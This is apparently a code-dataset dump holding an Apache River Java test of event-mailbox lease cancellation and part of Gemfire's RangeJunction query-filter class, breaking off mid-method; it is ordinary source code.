gt
stringclasses 1
value | context
stringlengths 2.05k
161k
|
---|---|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.river.test.spec.eventmailbox;
import java.util.logging.Level;
import java.rmi.RemoteException;
import java.rmi.NoSuchObjectException;
import java.rmi.ServerException;
import java.util.Date;
import org.apache.river.qa.harness.TestException;
import org.apache.river.qa.harness.QAConfig;
import net.jini.event.InvalidIteratorException;
import net.jini.event.RemoteEventIterator;
import net.jini.event.PullEventMailbox;
import net.jini.event.MailboxPullRegistration;
import net.jini.event.EventMailbox;
import net.jini.event.MailboxRegistration;
import net.jini.core.lease.Lease;
import net.jini.core.lease.UnknownLeaseException;
import net.jini.core.event.EventRegistration;
import net.jini.core.event.RemoteEvent;
import net.jini.core.event.RemoteEventListener;
import net.jini.io.MarshalledInstance;
import org.apache.river.constants.TimeConstants;
import org.apache.river.qa.harness.Test;
import org.apache.river.test.impl.mercury.EMSTestBase;
import org.apache.river.test.impl.mercury.TestUtils;
import org.apache.river.test.impl.mercury.TestListener;
import org.apache.river.test.impl.mercury.TestPullListener;
import org.apache.river.test.impl.mercury.TestPullListenerImpl;
import org.apache.river.test.impl.mercury.TestGenerator;
public class EMSRIFT_PULL extends EMSTestBase implements TimeConstants {
//
// This should be long enough to sensibly run the test.
// If the service doesn't grant long enough leases, then
// we might have to resort to using something like the
// LeaseRenewalManager to keep our leases current.
//
private final long DURATION1 = 3*MINUTES;
private final int NUM_EVENTS = 5;
private final long EVENT_ID = 1234;
private final long MAX_WAIT = 60 * 1000;
public void run() throws Exception {
PullEventMailbox mb = getPullMailbox();
int i = 0;
// Register and check lease
MailboxPullRegistration mr = getPullRegistration(mb, DURATION1);
Lease mrl = getPullMailboxLease(mr);
checkLease(mrl, DURATION1);
logger.log(Level.INFO, "Mailbox lease good until"
+ new Date(mrl.getExpiration()));
// Get the mailbox service provided listener
RemoteEventListener mbRel = getPullMailboxListener(mr);
// Create an event generator and pass it the
// mailbox's remote event listener.
TestGenerator myGen = TestUtils.createGenerator(getManager());
EventRegistration evtReg =
myGen.register(EVENT_ID, // Event ID to use
null, // handback
mbRel, // Notification target
DURATION1); // Lease duration
Lease tgl = evtReg.getLease();
checkLease(tgl, DURATION1);
// Create "listener" to collect events for this test
TestPullListener tpl = TestUtils.createPullListener(getManager());
int eventCount = 0;
// Generate some events
logger.log(Level.INFO, "Generating " + NUM_EVENTS + " events");
RemoteEvent[] events = new RemoteEvent[NUM_EVENTS];
for (i = 0; i < NUM_EVENTS; i++) {
events[i] = myGen.generateEvent(evtReg.getID(), 3);
}
RemoteEvent[] bogus = {
new RemoteEvent(myGen, 9999, 9999, (MarshalledInstance) null),
new RemoteEvent(myGen, 5678, 1234, (MarshalledInstance) null),
};
logger.log(Level.INFO, "Wating for event delivery");
eventCount = NUM_EVENTS;
getCollectedRemoteEvents(tpl, mr, eventCount, MAX_WAIT);
logger.log(Level.INFO, "Verifying event delivery count of " + eventCount);
assertCount(tpl, eventCount);
logger.log(Level.INFO, "Verifying events ");
assertEvents(tpl, events);
if(tpl.verifyEvents(bogus)) {
throw new TestException("Successfully verified bogus events");
}
// Get iterator handle before cancelling associated reg
RemoteEventIterator rei = mr.getRemoteEvents();
logger.log(Level.INFO, "Cancelling registration lease");
mrl.cancel();
logger.log(Level.INFO, "Generating " + NUM_EVENTS + " more events");
try {
for (i = 0; i < NUM_EVENTS; i++) {
events[i] = myGen.generateEvent(evtReg.getID(), 3);
}
} catch (ServerException se) {
Throwable detail = se.getCause();
if (detail != null &&
detail instanceof NoSuchObjectException) {
// can safely ignore this since we expect
// that the registration has expired.
logger.log(Level.INFO, "Caught NoSuchObjectException - expected");
} else { throw se; }
}
// Would like to assert that the event count hasn't changed, but
// invoking getRemoteEvents should fail with NSOE, as above.
try {
logger.log(Level.INFO, "Re-cancelling registration lease");
mrl.cancel();
throw new TestException("Successfully cancelled a cancelled registration");
} catch (UnknownLeaseException ule) {
logger.log(Level.INFO, "Caught UnknownLeaseException - expected");
}
try {
logger.log(Level.INFO, "Calling getRemoteEvents on expired reg");
mr.getRemoteEvents();
throw new TestException("Successfully called a cancelled registration");
} catch (NoSuchObjectException nsoe) {
logger.log(Level.INFO, "Caught NoSuchObjectException - expected");
}
try {
logger.log(Level.INFO, "Calling addUnknownEvents on expired reg");
mr.addUnknownEvents(new java.util.ArrayList());
throw new TestException("Successfully called a cancelled registration");
} catch (NoSuchObjectException nsoe) {
logger.log(Level.INFO, "Caught NoSuchObjectException - expected");
}
logger.log(Level.INFO, "Calling next() on expired reg iterator");
RemoteEvent re;
boolean done = false;
int exceptionCount = 0;
while (!done) {
try {
re = rei.next(MAX_WAIT);
if (re != null) {
logger.log(Level.INFO, "Got RemoteEvent", re);
} else {
throw new TestException(
"Successfully iterated through an expired iter ref");
}
} catch (NoSuchObjectException nsoe) {
logger.log(Level.INFO, "Caught NoSuchObjectException - expected");
done = true;
} catch (RemoteException rex) {
// log and retry
logger.log(Level.INFO, "Caught RemoteException", rex);
if (exceptionCount++ >= 10) {
throw new TestException(
"Too many remote exceptions received");
}
}
}
logger.log(Level.INFO, "Calling close() on expired reg iterator");
rei.close();
try {
logger.log(Level.INFO, "Calling close() again on expired reg iterator");
rei.close();
throw new TestException("Successfully called a close twice");
} catch (InvalidIteratorException iie) {
logger.log(Level.INFO, "Caught InvalidIteratorException - expected");
}
}
/**
* Invoke parent's construct and parser
* @exception TestException will usually indicate an "unresolved"
* condition because at this point the test has not yet begun.
*/
public Test construct(QAConfig config) throws Exception {
super.construct(config);
parse();
return this;
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/*
* Created on Jan 27, 2008
*/
package com.gemstone.gemfire.cache.query.internal;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Set;
import com.gemstone.gemfire.cache.query.AmbiguousNameException;
import com.gemstone.gemfire.cache.query.FunctionDomainException;
import com.gemstone.gemfire.cache.query.Index;
import com.gemstone.gemfire.cache.query.NameResolutionException;
import com.gemstone.gemfire.cache.query.QueryInvocationTargetException;
import com.gemstone.gemfire.cache.query.QueryService;
import com.gemstone.gemfire.cache.query.SelectResults;
import com.gemstone.gemfire.cache.query.Struct;
import com.gemstone.gemfire.cache.query.TypeMismatchException;
import com.gemstone.gemfire.internal.i18n.LocalizedStrings;
import com.gemstone.gemfire.cache.query.internal.parse.OQLLexerTokenTypes;
import com.gemstone.gemfire.cache.query.internal.types.StructTypeImpl;
import com.gemstone.gemfire.cache.query.internal.types.TypeUtils;
import com.gemstone.gemfire.cache.query.types.ObjectType;
import com.gemstone.gemfire.cache.query.types.StructType;
/**
* This structure contains all the filter evaluatable CompiledComparision
* conditions which are using identical index. Presently this Object will be
* formed only if the junction is an AND and will either be a part of a
* GroupJunction or can be a stand alone Junction. In case it is a stand alone
* Junction, then it can possibly have a not null Iter Operand, so that it can
* be evaluated along with the expansion/truncation of index result.
*
* @author asif
*/
public class RangeJunction extends AbstractGroupOrRangeJunction {
private final static int RANGE_SIZE_ESTIMATE = 3;
//moved to AbstractGroupOrRangeJunction
//private CompiledValue iterOperands;
RangeJunction(int operator, RuntimeIterator[] indpndntItr,
boolean isCompleteExpansion, CompiledValue[] operands) {
super(operator, indpndntItr, isCompleteExpansion, operands);
}
void addUnevaluatedFilterOperands(List unevaluatedFilterOps) {
throw new UnsupportedOperationException("This method should not have been invoked");
}
// moved to AbstractGroupOrRangeJunction
/* void addIterOperands(CompiledValue iterOps) {
this.iterOperands = iterOps;
}*/
private RangeJunction(AbstractGroupOrRangeJunction oldGJ,
boolean completeExpansion, RuntimeIterator indpnds[], CompiledValue iterOp) {
super(oldGJ, completeExpansion, indpnds, iterOp);
}
@Override
AbstractGroupOrRangeJunction recreateFromOld(boolean completeExpansion,
RuntimeIterator indpnds[], CompiledValue iterOp) {
return new RangeJunction(this, completeExpansion, indpnds, iterOp);
}
@Override
AbstractGroupOrRangeJunction createNewOfSameType(int operator,
RuntimeIterator[] indpndntItr, boolean isCompleteExpansion,
CompiledValue[] operands) {
return new RangeJunction(operator, indpndntItr, isCompleteExpansion,
operands);
}
@Override
public PlanInfo getPlanInfo(ExecutionContext context)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
/*
* This function would be called only if the RangeJunction is a part of
* GroupJunction.It would be invoked in the organized operands method of
* GroupJunction. In such case it is guaranteed that all the operands are
* the filter operand using the same index. In such case there is zero
* possibility o first iterator being either an iter operand or a constant.
* As those types of Operands would be part of Group Junction
*/
return this._operands[0].getPlanInfo(context);
}
public boolean isConditioningNeededForIndex(RuntimeIterator independentIter, ExecutionContext context, boolean completeExpnsNeeded) throws AmbiguousNameException, TypeMismatchException, NameResolutionException {
return true;
}
public int getOperator() {
return LITERAL_and;
}
public boolean isBetterFilter(Filter comparedTo, ExecutionContext context, final int thisSize) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException
{
//If the current filter is equality & comparedTo filter is also equality based , then
// return the one with lower size estimate is better
boolean isThisBetter = true;
//Go with the lowest cost when hint is used.
if (context instanceof QueryExecutionContext && ((QueryExecutionContext)context).hasHints()) {
return thisSize <= comparedTo.getSizeEstimate(context);
}
int thatOperator = comparedTo.getOperator() ;
switch(thatOperator) {
case TOK_EQ:
isThisBetter = false;
break;
case TOK_NE:
case TOK_NE_ALT:
//Give preference to Range
break;
case LITERAL_and:
//Asif: What to do? Let current be the better one for the want of better estimation
break;
case TOK_LE:
case TOK_LT:
case TOK_GE:
case TOK_GT:
//Give preference to this rather than single condition inequalities as a rangejunction
//would possibly be bounded resulting in lesser values
break;
default :
throw new IllegalArgumentException("The operator type ="+ thatOperator + " is unknown");
}
return isThisBetter;
}
/**
* Segregates the operands of the RangeJunction into iter evaluatable and
* filter evaluatable.
*/
@Override
OrganizedOperands organizeOperands(ExecutionContext context)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
// get the list of operands to evaluate,
// and evaluate operands that can use indexes first
if (getOperator() == LITERAL_and) {
return organizeOperandsForAndJunction(context);
}
else {
throw new IllegalStateException(
LocalizedStrings.RangeJunction_IN_THE_CASE_OF_AN_OR_JUNCTION_A_RANGEJUNCTION_SHOULD_NOT_BE_FORMED_FOR_NOW.toLocalizedString());
}
}
// TODO:Asif: Currently the condition a!= null AND a =3, would be evalauted
// via intersection. This needs to be optmized, but since it is not
// common use case as != null is a not required operand , for the time being
// ignoring the optmization.
/**
* For the filter evaluatable conditions , it creates the appropriate
* JunctionEvaluator ( NotEqualConditionEvaluator or SingleCondnEvaluator or
* DoubleCondnRangeJunctionEvaluator ). The junction Evaluator itself is
* filter evaluatable. The operands which are of type != null , == null , !=
* undefined, == undefined are left as it is & are not combined into a
* Junction Evaluator. Thus the organized operand of RangeJunction may created
* atmost one Condition Evaluator, will retain the operands containing null
* ,undefined conditions. In case there is a equality condition , then it may
* result in a filter having just that condition assuming other conditions
* satisfy the equality. In case it turns out that the conditions are mutually
* exclusive then the organized operand would just contain a single filter
* evaluatable CompiledLiteral (false) ( indicating empty resultset).
*/
private OrganizedOperands organizeOperandsForAndJunction(
ExecutionContext context) throws AmbiguousNameException,
FunctionDomainException, TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
List evalOperands = new ArrayList(_operands.length);
int evalCount = 0;
int lessCondnOp = -1;
int greaterCondnOp = -1;
CompiledComparison lessCondnOperand = null;
CompiledComparison greaterCondnOperand = null;
CompiledComparison equalCondnOperand = null;
Object equalCondKey = null;
Object lessCondnKey = null;
Object greaterCondnKey = null;
boolean emptyResults = false;
Set notEqualTypeKeys = null;
boolean possibleRangeFilter = false;
IndexInfo indxInfo = null;
for (int i = 0; i < _operands.length; i++) {
CompiledValue operand = _operands[i];
if (operand.getPlanInfo(context).evalAsFilter) {
Indexable cc = (Indexable)operand;
if (indxInfo == null) {
indxInfo = cc.getIndexInfo(context)[0];
}
// TODO: Asif :Try to ensure that a CompiledUndefined never
// goes in the RangeJunction. That means modify the
// CompiledJunction code to avoid CompiledUndefined's inclusion
// That way we can ensure that CompiledComparison only become part
// of RangeJunction
if (!cc.isRangeEvaluatable()) {
evalCount++;
evalOperands.add(0, _operands[i]);
continue;
}
CompiledValue ccKey = ((CompiledComparison)cc).getKey(context);
Object evaluatedCCKey = ccKey.evaluate(context);
int operator = ((CompiledComparison)cc).reflectOnOperator(ccKey);
if (evaluatedCCKey == null) {
evalCount++;
evalOperands.add(0, _operands[i]);
continue;
}
if (equalCondnOperand != null) {
emptyResults = !isConditionSatisfied(equalCondKey, evaluatedCCKey,
operator);
if (emptyResults) {
break;
}
else {
continue;
}
}
switch (operator) {
case TOK_EQ:
possibleRangeFilter = false;
equalCondnOperand = (CompiledComparison)cc;
equalCondKey = evaluatedCCKey;
break;
case TOK_NE:
case TOK_NE_ALT:
possibleRangeFilter = true;
if (notEqualTypeKeys == null) {
notEqualTypeKeys = new HashSet(_operands.length);
}
evaluatedCCKey = TypeUtils.indexKeyFor(evaluatedCCKey);
notEqualTypeKeys.add(evaluatedCCKey);
break;
case TOK_GE:
case TOK_GT:
possibleRangeFilter = true;
if (greaterCondnOperand == null) {
greaterCondnOperand = (CompiledComparison)cc;
greaterCondnKey = evaluatedCCKey;
greaterCondnOp = operator;
}
else {
if (isConditionSatisfied(evaluatedCCKey, greaterCondnKey,
greaterCondnOp)) {
greaterCondnKey = evaluatedCCKey;
greaterCondnOperand = (CompiledComparison)cc;
greaterCondnOp = operator;
}
}
break;
case TOK_LE:
case TOK_LT:
// Asif: if there exists a previous equal Operand & current
// condition's value is greater than the equal operand's value, it
// will be empty results
possibleRangeFilter = true;
if (lessCondnOperand == null) {
lessCondnOperand = (CompiledComparison)cc;
lessCondnKey = evaluatedCCKey;
lessCondnOp = operator;
}
else {
if (isConditionSatisfied(evaluatedCCKey, lessCondnKey, lessCondnOp)) {
lessCondnKey = evaluatedCCKey;
lessCondnOperand = (CompiledComparison)cc;
lessCondnOp = operator;
}
}
break;
}
}
else if (!_operands[i].isDependentOnCurrentScope(context)) {
// TODO: Asif :Remove this Assert & else if condition after successful
// testing of the build
Support
.assertionFailed("An independentoperand should not ever be present as operand inside a GroupJunction as it should always be present only in CompiledJunction");
}
else {
evalOperands.add(_operands[i]);
}
}
if (!emptyResults) {
Filter filter = null;
if (equalCondnOperand != null) {
// Check if any of the preceding inequality operands, that have not been
// checked against the equality operand , are not able to satisfy the
// equality.
if (lessCondnOperand != null
&& !this.isConditionSatisfied(equalCondKey, lessCondnKey,
lessCondnOp)) {
emptyResults = true;
}
else if (greaterCondnOperand != null
&& !this.isConditionSatisfied(equalCondKey, greaterCondnKey,
greaterCondnOp)) {
emptyResults = true;
}
else if (notEqualTypeKeys != null) {
Iterator itr = notEqualTypeKeys.iterator();
while (itr.hasNext() && !emptyResults) {
emptyResults = !this.isConditionSatisfied(equalCondKey, itr.next(),
OQLLexerTokenTypes.TOK_NE);
}
}
if (!emptyResults) {
filter = equalCondnOperand;
}
}
else if (possibleRangeFilter) {
if (lessCondnOperand != null && greaterCondnOperand != null) {
emptyResults = !checkForRangeBoundednessAndTrimNotEqualKeyset(
notEqualTypeKeys, lessCondnKey, lessCondnOp, greaterCondnKey,
greaterCondnOp);
if (!emptyResults) {
filter = new DoubleCondnRangeJunctionEvaluator(lessCondnOp,
lessCondnKey, greaterCondnOp, greaterCondnKey,
(notEqualTypeKeys == null || notEqualTypeKeys.isEmpty()) ? null
: notEqualTypeKeys, indxInfo);
}
}
else if (greaterCondnOperand != null) {
filter = generateSingleCondnEvaluatorIfRequired(notEqualTypeKeys,
greaterCondnOperand, greaterCondnOp, greaterCondnKey, indxInfo);
}
else if (lessCondnOperand != null) {
filter = generateSingleCondnEvaluatorIfRequired(notEqualTypeKeys,
lessCondnOperand, lessCondnOp, lessCondnKey, indxInfo);
}
else {
assert notEqualTypeKeys != null && !notEqualTypeKeys.isEmpty();
// TODO:Asif Ideally if there is a single NotEqualKey we should
// not create NotEqualCondnEvaluator instead just add the
// CompiledComparison
// operand to the eval operands list. But since we do retain the
// operand
// correponding to the NotEqualKey in this function , we are creating
// the NotEqualCondnEvaluator
filter = new NotEqualConditionEvaluator(notEqualTypeKeys, indxInfo);
}
}
if (emptyResults) {
evalOperands.clear();
evalCount = 1;
evalOperands.add(new CompiledLiteral(Boolean.FALSE));
}
else if (filter != null) {
evalCount++;
evalOperands.add(0, filter);
}
}
else {
// Asif: Create a new CompiledLiteral with boolean false
evalOperands.clear();
evalCount = 1;
evalOperands.add(new CompiledLiteral(Boolean.FALSE));
}
//If no hints were provided, we continue with our single index solution
if (!(context instanceof QueryExecutionContext) || !((QueryExecutionContext)context).hasMultiHints()) {
// At the end check if the unevaluatedIterOperand
// are null or not. This could be the case only if at top level
// GroupJunction is formed having multiple RangeJunctions & other
// iter operands & then only one RangeJunction is treated as filter
// rest all as iter operands. In that case , the only iter operand is
// that which is added externally to RangeJunction. If the top
// level was a RangeJunction then the iter operands would have been
// part of it at the time of creation of RangeJunction & we would not have
// to add it externally.
if(getIterOperands() != null) {
// Commented the assert for CompiledLike which creates 2 or 3 CompiledComparisons
// for the same operand. The protGetPlanInfo in CompiledLike could return evalAsFilter
// as true the first time and false the next time for the same operand.
// Hence the evalOperands could contain CompiledComparisons more than number of indexes.
//Support.Assert(evalOperands.size() == evalCount);
evalOperands.add(getIterOperands());
}
}
return createOrganizedOperandsObject(evalCount, evalOperands);
}
/**
* Checks if key1 operator key2 is true or not. The operator could be =, != , <, >,<=,>=
*
* @param key1
* @param key2
* @param operator
* @return boolean true if the condition is satisfied else false
* @throws TypeMismatchException
*/
private boolean isConditionSatisfied(Object key1, Object key2, int operator)
throws TypeMismatchException {
return ((Boolean)TypeUtils.compare(key1, key2, operator)).booleanValue();
}
/**
* Checks if the Range junction containing less & greater type of inequalities
* has a lower and upper bound , in the sense that they do not represent a
* mutually exclusive condition like a> 10 and a <9 etc. If the condition is
* bounded in nature, it further checks if the not equal type keys fall in the
* bounded range , else it removes it from the Not Equal Keys set
*
* @param notEqualKeys
* Set containing keys of operands having 'Not Equal' (!=) type
* conditions
* @param lessCondnKey
* Key of the 'Less' condition operand
* @param lessOperator
* Type of 'less' operator ( < or <=)
* @param greaterCondnKey
* Key of the 'greater' condition operand
* @param greaterCondnOp
* Type of 'greater' operator ( > or >=)
* @return boolean true if the nature is bounded else false ( unbounded )
* @throws TypeMismatchException
*/
private boolean checkForRangeBoundednessAndTrimNotEqualKeyset(
Set notEqualKeys, Object lessCondnKey, int lessOperator,
Object greaterCondnKey, int greaterCondnOp) throws TypeMismatchException {
// First check if the range is bounded or (unbounded and mutually
// exclusive).
// If it is unbounded immediately return a false
if (isConditionSatisfied(greaterCondnKey, lessCondnKey, lessOperator)
&& isConditionSatisfied(lessCondnKey, greaterCondnKey, greaterCondnOp)) {
// Nowremove those not equal conditions which do not satisfy the range
if (notEqualKeys != null) {
Iterator itr = notEqualKeys.iterator();
Object neKey = null;
while (itr.hasNext()) {
neKey = itr.next();
if (!this
.isConditionSatisfied(neKey, greaterCondnKey, greaterCondnOp)
|| !this.isConditionSatisfied(neKey, lessCondnKey, lessOperator)) {
itr.remove();
}
}
}
return true;
}
else {
return false;
}
}
/**
* Creates a Filter of type SingleCondnEvaluator if there exists atleast one
* key of type "NOT EQUAL" which satisfies the 'less' or 'greater' type
* operand. Otherwise the Filter is nothing but the CompiledComparison
* representing the 'less' or 'greater' inequality
*
* @param notEqualKeys
* Set containing NotEqual type Keys
* @param operand
* CompiledValue representing the 'Less' or 'Greater' operand
* @param operator
* Type of 'Less' or 'Greater' operand
* @param condnKey
* The Key corresponding to the Operand representing the 'Less'
* or 'Greater' inequality
* @param indxInfo
* The IndexInfo object for this RangeJunction
* @return Filter object of type CompiledComparison or
* RangeJunction.SingleCondnEvaluator object
* @throws TypeMismatchException
*/
private Filter generateSingleCondnEvaluatorIfRequired(Set notEqualKeys,
CompiledValue operand, int operator, Object condnKey, IndexInfo indxInfo)
throws TypeMismatchException {
Filter rangeFilter;
if (notEqualKeys != null) {
// Eliminate all the not equal keys which will never be satisfied by
// the given greater condn
Iterator itr = notEqualKeys.iterator();
while (itr.hasNext()) {
Object neKey = itr.next();
if (!((Boolean)TypeUtils.compare(neKey, condnKey, operator))
.booleanValue()) {
itr.remove();
}
}
if (notEqualKeys.isEmpty()) {
notEqualKeys = null;
}
}
rangeFilter = (notEqualKeys != null) ? new SingleCondnEvaluator(operator,
condnKey, notEqualKeys, indxInfo) : (Filter)operand;
return rangeFilter;
}
public Object evaluate(ExecutionContext context)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
Object r = _operands[0].evaluate(context); // UNDEFINED, null, or a
// Boolean
// if it's false and the op in this case will always be AND so return
// false immediately
if (r instanceof Boolean && !((Boolean) r).booleanValue())
return r;
if (r == null || r == QueryService.UNDEFINED)
r = QueryService.UNDEFINED; // keep going to see if we hit a
// short-circuiting truth value
else if (!(r instanceof Boolean))
throw new TypeMismatchException(
"LITERAL_and/LITERAL_or operands must be of type boolean, not type '"
+ r.getClass().getName() + "'");
for (int i = 1; i < _operands.length; i++) {
Object ri = _operands[i].evaluate(context); // UNDEFINED, null, or
// Boolean
if (ri instanceof Boolean && !((Boolean) ri).booleanValue())
return ri;
if (ri == null || ri == QueryService.UNDEFINED
|| r == QueryService.UNDEFINED) {
r = QueryService.UNDEFINED;
continue; // keep going to see if we hit a short-circuiting
// truth value
} else if (!(ri instanceof Boolean))
throw new TypeMismatchException(
"LITERAL_and/LITERAL_or operands must be of type boolean, not type '"
+ ri.getClass().getName() + "'");
// now do the actual and
r = new Boolean(((Boolean) r).booleanValue()
&& ((Boolean) ri).booleanValue());
}
return r;
}
@Override
public int getType() {
return LITERAL_and;
}
@Override
public void visitNodes(NodeVisitor visitor) {
Support.assertionFailed("Should not have come here");
}
public int getSizeEstimate(ExecutionContext context)
{
//TODO:Asif:Try to estimate better
return RANGE_SIZE_ESTIMATE;
}
/*
* private organizeOperandsForORJunction() {
* }
*/
/**
* Test method which checks if the Filter operand is of type
* SingleCondnEvaluator
*/
static boolean isInstanceOfSingleCondnEvaluator(Object o) {
return o instanceof RangeJunction.SingleCondnEvaluator;
}
/**
* Test method which checks if the Filter operand is of type
* NotEqualConditionEvaluator
*/
static boolean isInstanceOfNotEqualConditionEvaluator(Object o) {
return o instanceof RangeJunction.NotEqualConditionEvaluator;
}
/**
* Test method which checks if the Filter operand is of type
* DoubleCondnRangeJunctionEvaluator
*/
static boolean isInstanceOfDoubleCondnRangeJunctionEvaluator(Object o) {
return o instanceof RangeJunction.DoubleCondnRangeJunctionEvaluator;
}
/**
* Test function which retrieves the "NOT EQUAL KEYS"
*
* @param o
* Object of type NotEqualConditionEvaluator from which the set
* containing the keys for removal need to be retrieved
* @return Unmodifiable Set containing the keys for removal
*/
static Set getKeysToBeRemoved(Object o) {
if (o instanceof NotEqualConditionEvaluator) {
if (((NotEqualConditionEvaluator)o).notEqualTypeKeys == null) {
return null;
}
return Collections
.unmodifiableSet(((NotEqualConditionEvaluator)o).notEqualTypeKeys);
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the SingleCondnEvaluator operator
*
* @param o
* Object of type SingleCondnEvaluator from which the set
* containing the keys for removal need to be retrieved
* @return int indicating the operator
*/
static int getSingleCondnEvaluatorOperator(Object o) {
if (o instanceof SingleCondnEvaluator) {
return ((SingleCondnEvaluator)o).condnOp;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the evaluated Key for a SingleCondnEvaluator
* operator
*
* @param o
* Object of type SingleCondnEvaluator from which the set
* containing the keys for removal need to be retrieved
* @return Object representing the evaluated Key
*/
static Object getSingleCondnEvaluatorKey(Object o) {
if (o instanceof SingleCondnEvaluator) {
return ((SingleCondnEvaluator)o).condnKey;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the LESS type evaluated Key for a
* DoubleCondnEvaluator operator
*
* @param o
* Object of type DoubleCondnEvaluator
* @return Object representing the evaluated Key of Less Type
*/
static Object getDoubleCondnEvaluatorLESSKey(Object o) {
if (o instanceof DoubleCondnRangeJunctionEvaluator) {
return ((DoubleCondnRangeJunctionEvaluator)o).lessCondnKey;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the GREATER type evaluated Key for a
* DoubleCondnEvaluator operator
*
* @param o
* Object of type DoubleCondnEvaluator
* @return Object representing the evaluated Key of GREATER Type
*/
static Object getDoubleCondnEvaluatorGreaterKey(Object o) {
if (o instanceof DoubleCondnRangeJunctionEvaluator) {
return ((DoubleCondnRangeJunctionEvaluator)o).greaterCondnKey;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the operator of Less Type
*
* @param o
* Object of type DoubleCondnEvaluator
* @return int indicating the operator of less Type
*/
static int getDoubleCondnEvaluatorOperatorOfLessType(Object o) {
if (o instanceof DoubleCondnRangeJunctionEvaluator) {
return ((DoubleCondnRangeJunctionEvaluator)o).lessCondnOp;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the operator of GREATER Type
*
* @param o
* Object of type DoubleCondnEvaluator
* @return int indicating the operator of less Type
*/
static int getDoubleCondnEvaluatorOperatorOfGreaterType(Object o) {
if (o instanceof DoubleCondnRangeJunctionEvaluator) {
return ((DoubleCondnRangeJunctionEvaluator)o).greaterCondnOp;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the underlying Index for a
* NotEqualConditionEvaluator operator
*
* @param o
* Object of type NotEqualConditionEvaluator from which the
* index needs to be retrieved
* @return Index
*/
static Index getIndex(Object o) {
if (o instanceof NotEqualConditionEvaluator) {
return ((NotEqualConditionEvaluator)o).indxInfo._index;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Filter Object created by the RangeJunction on invocation of its
* organizedOperands method. The object of this class will be created only if
* RangeJunction contains more than one 'NOT EQUAL' ( != ) type conditions (
* apart from conditions having null or undefined as key). This class is also
* extended by SingleCondnEvaluator and DoubleCondnRangeJunctionEvaluator
*
* @author asif
*
*/
private static class NotEqualConditionEvaluator extends AbstractCompiledValue
implements Filter {
final Set notEqualTypeKeys;
final IndexInfo indxInfo;
/**
*
* @param notEqualTypeKeys
* java.utils.Set object containing the Keys of the 'NOT
* EQUAL' type conditions ( a != 3 and a !=5) For
* DoubleCondnRangeJunctionEvaluator , this may be null
* @param indxInfo
* The IndexInfo object corresponding to the RangeJunction
*/
NotEqualConditionEvaluator(Set notEqualTypeKeys, IndexInfo indxInfo) {
this.notEqualTypeKeys = notEqualTypeKeys;
this.indxInfo = indxInfo;
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit, boolean completeExpansionNeeded,
CompiledValue iterOperands, RuntimeIterator[] indpndntItrs, boolean isIntersection,boolean conditioningNeeded, boolean evalProj)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
ObjectType resultType = this.indxInfo._index.getResultSetType();
int indexFieldsSize = -1;
SelectResults set = null;
Boolean orderByClause = (Boolean)context.cacheGet(CompiledValue.CAN_APPLY_ORDER_BY_AT_INDEX);
boolean useLinkedDataStructure = false;
boolean nullValuesAtStart = true;
if(orderByClause != null && orderByClause.booleanValue()) {
List orderByAttrs = (List)context.cacheGet(CompiledValue.ORDERBY_ATTRIB);
useLinkedDataStructure =orderByAttrs.size()==1;
